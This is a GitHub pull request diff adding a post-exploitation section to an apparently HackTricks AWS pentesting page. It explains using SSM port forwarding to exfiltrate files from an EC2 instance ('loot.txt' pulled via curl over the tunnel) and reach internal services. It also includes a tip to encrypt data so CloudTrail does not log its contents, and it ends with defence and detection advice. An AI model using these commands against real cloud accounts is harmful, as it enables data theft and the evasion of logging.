Skip to content

How to transfer files in AWS using SSM #195

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

How to transfer files in AWS using SSM #195

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
61 changes: 61 additions & 0 deletions ...urity/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -138,6 +138,63 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls-

Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.

---

#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession)

If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required):

```bash
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8000","localPortNumber"="8000" \
--region <REGION>
```

The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**.

Common use cases:

* **File exfiltration**
1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate:

```bash
python3 -m http.server 8000
```

2. From your workstation fetch the files through the SSM tunnel:

```bash
curl http://localhost:8000/loot.txt -o loot.txt
```

* **Accessing internal web applications (e.g. Nessus)**

```bash
# Forward remote Nessus port 8834 to local 8835
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8834","localPortNumber"="8835"
# Browse to http://localhost:8835
```

Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content:

```bash
# On the instance
7z a evidence.7z /path/to/files/* -p'Str0ngPass!'
```

---

**Defence & Detection**

* Limit who can call `ssm:StartSession` or restrict the allowed SSM documents.
* Enable Session Manager logging to CloudWatch/S3 and monitor for the `AWS-StartPortForwardingSession` document.
* Use VPC endpoints plus traffic inspection to detect unexpected data egress.



### Share AMI

```bash
Expand Down Expand Up @@ -474,6 +531,10 @@ if __name__ == "__main__":
main()
```

## References

- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/)

{{#include ../../../../banners/hacktricks-training.md}}


Expand Down